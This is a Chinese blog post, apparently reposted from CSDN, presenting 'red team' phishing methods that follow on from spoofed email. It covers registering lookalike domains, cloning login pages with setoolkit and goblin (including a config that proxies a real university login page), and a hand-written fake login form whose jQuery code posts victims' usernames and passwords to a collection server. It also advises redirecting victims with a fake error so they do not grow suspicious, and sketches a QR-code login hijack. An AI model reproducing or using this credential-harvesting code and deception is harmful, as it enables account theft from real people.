首页 > 其他分享 >红队钓鱼手法(二)-伪造邮件后续钓鱼手法

红队钓鱼手法(二)-伪造邮件后续钓鱼手法

时间:2024-07-20 11:27:25浏览次数:17  
标签:网页 登录 钓鱼 js 二维码 手法 红队 伪造

#网页钓鱼:
之前一篇文章提到了再伪造邮件可以进行跳转指定地址,虽然会出现有xxx代为转发,但可以通过自己搭建smtp服务,自己搭建邮箱系统,但国内大厂的云服务器默认禁止25端口,想个人申请比较困难,我们购买其他的云厂商的服务器,买国外,或者香港等一些不需要备案申请域名的更好,我们申请一些如aliyun.com.cn ,allyun.cn等等相似高的域名来搭建邮箱系统,这样就算会出现代为转发的的字样但不仔细观察还是很容易忽略伪造发件人的
接下来我们对邮件伪造的后续利用来分析
邮件中或其他方式配合网页钓鱼,以自行搭建的网页冒充真实站点,通过诱使及引导让受害者下载后门文件或登录自身用户凭据,从而获取目标相关资产信息或权限。

1、setoolkit
优点:方便,快速伪造
缺点:存在bug对于大型网页,出现伪造不全,乱码,监听数据若被加密需要js逆向
https://github.com/trustedsec/social-engineer-toolkit
kali自带
在这里插入图片描述
选择顺序: 1->2->3->2
set:webattack> IP address for the POST back in Harvester/Tabnabbing [192.168.73.132]:这里我建立在本地,实际为真实的服务器地址,域名就写域名
回车
输入伪造网址,看到开发一个80端口
在这里插入图片描述
很明显,出现乱码,伪造的效果不行,输入数据看看,输入admin | 123456
在这里插入图片描述
可以看到,虽然出现账号密码,但密码时被js代码加密过,如果不能js逆向算法,不能获得明文,还是无法利用,对于京东的登录网页伪造的效果也并不优秀,对一些小网站的伪造还是可以的,但同样若存在前端js加密,还是会有相同的问题
这边又尝试伪造了几个网站
在这里插入图片描述
还是会有出现乱码问题,这里不过分赘述

2、goblin
优点:上手容易,伪造效果中等
缺点: 监听数据若被加密需要js逆向
https://github.com/xiecat/goblin
安装完,执行goblin.exe,下载
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
效果很逼真,并且可以进行xss
demo.yaml在这里插入图片描述
goblin.yaml
在这里插入图片描述

127.0.0.1:8085:
  Listen: 0.0.0.0
  StaticPrefix: j27130dllx
  SSL: false
  CAKey: ""
  CACert: ""
  ProxyPass: https://id.scu.edu.cn/frontend/login#/login
  Plugin: ""

来看看效果
在这里插入图片描述
对比一下
在这里插入图片描述
钓鱼网站构建好了,看看截取的数据,goblin会保存在当前目录的access.log文件中
我们输入admin 123456看看
在这里插入图片描述
可以看到,还是一样的问题,加密数据,需要逆向,但效果已经相当不错了,若js逆向能力强完全可以.

3、手工演示:网页另存为
上手容易,需要代码开发技能
打开网页,ctrl+s另存网页
在这里插入图片描述


            <input class="login_box_input1" id="un" tabindex="1" value="" autocomplete="off" placeholder="用户名" />
            <input class="login_box_input1" id="pd" tabindex="2" type="password" autocomplete="off" placeholder='密码' />
            <span class="landing_btn_bg1">
              <a id="loginsubmit" style="color: #fff;font-family: Microsoft YaHei;width:278px;font-size: 16px;">立即登录</a>
              <script src="https://code.jquery.com/jquery-3.6.0.min.js"></script>
              <script>
                $(document).ready(function () {
                  // 监听登录按钮点击事件
                  $('#loginsubmit').click(function (event) {
                    event.preventDefault(); // 阻止默认的提交行为
                    // 获取用户名和密码
                    var username = $('#un').val();
                    var password = $('#pd').val();
                    // 发送 AJAX 请求到指定的 URL
                    $.post('http://127.0.0.1:81/post.php', { loginname: username, nloginpwd: password }, function (response) {
                      // 处理响应,比如根据返回的结果进行页面跳转或显示错误信息
                      console.log(response); // 输出 post.php 返回的信息
                    });
                  });
                });
              </script>
            </span>

自己搭建接受服务器,输入admin | admin888 看看
在这里插入图片描述
在这里插入图片描述
可以看到,监听截取到是未经加密的值,直接避免了无法js逆向算法的情况,后续我们可以以网络错误,网络异常等报错让对方跳转到真正地址进而避免目标起疑心立刻修改密码

4、二维码

自己访问的二维码同步到钓鱼页面上(异步调用)

原理:
如同别人把自己的登录二维码发给我们,我们用自己的手机扫码,实际上对方那边就会登录我们自己的账号,我们可以在钓鱼网页中的二维码放自己这边的登录二维码,目标对其扫码后,对方的账户便会登录在我们这边,但需要解决二维码的有效期的问题,这个留到下篇来解决.

标签:网页,登录,钓鱼,js,二维码,手法,红队,伪造
From: https://blog.csdn.net/Success696/article/details/140508036

相关文章

  • 红队信息搜集总结
    红队信息搜集总结简介信息搜集在渗透测试or红蓝对抗中是前期的主要工作,有说法是信息搜集做的时间越长,打起来就越简单。一般攻击者在进行渗透前都要列一个checklist,列出要搜集/攻击的信息/漏洞,一份简单的ckecklist如下所示子域名路径端口旁站C段中间件真实IP系统类型、......
  • 你对红队了解多少?成为红队需要具备哪些技术实力?
    提起红队,似乎在网络安全行业内大家都会默认红队就是攻击队,而蓝队则是防守队。大部分文章也会把红队解释为一种全范围的多层攻击模拟,我们平常沟通也会这样说。而事实上,到底什么才是红队?红队一般是以参演单位现有的网络安全防护体系为基础,在实战攻防演期间组建的防守队伍。......
  • 连载|浅谈红队中的权限维持(三)-Window主机后门
    前言本文来源无问社区,更多实战内容,渗透思路尽在无问社区http://www.wwlib.cn/index.php/artread/artid/11101.html续接上文浅谈红队中的打点(连载第二篇)不过因为一些权限维持的方法需要管理员权限才行,所有这时又需要先提权才能做权限维持;有时如果想做域控权限维持又需要先......
  • 连载|浅谈红队中的外网信息收集(一)
    前言最近在对以往所学习的有关红队的知识点进行梳理总结,这里主要参考了ATT&CK矩阵模型,不过对其进行了简化,同时加入了一些国内特有的情况放了进去。大体上会按照外网信息收集、打点、权限维持、提权、内网信息收集、横向移动、痕迹清理这样的顺序展开。本文来源无问社区,更......
  • 钓鱼邮件演练——筑牢企业安全防线的新篇章
    在信息爆炸的时代,网络安全已经成为企业和组织不可忽视的重要议题。尤其是钓鱼邮件,作为网络犯罪中最常见的手法之一,不仅能够窃取敏感信息,还可能引发连锁反应,对企业造成巨大的经济损失和声誉损害。中国联通国际公司深刻理解这一挑战,为此推出了一款专为企业设计的“钓鱼邮件演练”产......
  • 【工具分享】Gophish——网络钓鱼框架
    文章目录Gophish安装方式功能简介GophishGophish是一个开源的网络钓鱼框架,它被设计用于模拟真实世界的钓鱼攻击,以帮助企业和渗透测试人员测试和评估他们的网络钓鱼风险。Gophish旨在使行业级的网络钓鱼培训对每个人都是可获取的,它易于安装、使用,并且完全免费。它......
  • 隐写术和常见手法
    目录隐写术和加密的区别隐写原理物理上的隐写术电子上的隐写术场景隐写术是一种将信息隐藏在其他媒体中的技术。通过使用特定的方法和技术,可以将信息编码成图像、文本或其他形式的媒体,而这些信息只有在特定的方式下才能被读取。隐写术的基本原理是利用人类视觉、听觉或其他感......
  • 【安全运营】企业钓鱼演练实践
    一、群智集锦问:请教各位师傅个问题,你们多长时间做一次钓鱼演练?答:全员型的半年一次,小范围的一个季度一次;答:我们内部每月都有做钓鱼演练,主要针对新员工,钓鱼主题一般不改变,针对全员的时候会换一下套路;问:请教个问题,大家进行钓鱼演练统计是怎么统计展示的,现在有个问题,不同的部......
  • .NET 矩阵6月红队工具和资源集合
    01外网入口打点1.1Sharp4WbemScripting1.2ASP4Eval1.3Sharp4Web.config1.4Sharp4AddScript02安全防御绕过2.1Sharp4DefenderStop03搭建代理隧道3.1Sharp4suo504混淆加密防护4.1Obfuscar混淆器4.2Sharp4BatchGuard05安全技术文档5.1......
  • csrf跨站请求,钓鱼网站实现示例,CSRF校验,CSRF相关装饰器,Auth模块,扩展Auth表
    ⅠDjango框架之csrf跨站请求【一】跨站请求伪造介绍【1】引入CSRF(Cross-SiteRequestForgery)跨站请求伪造是一种常见的网络攻击方式。攻击者通过诱导受害者访问恶意网站或点击恶意链接将恶意请求发送到目标网站上利用受害者在目标网站中已登录的身份来执行某些操作从而......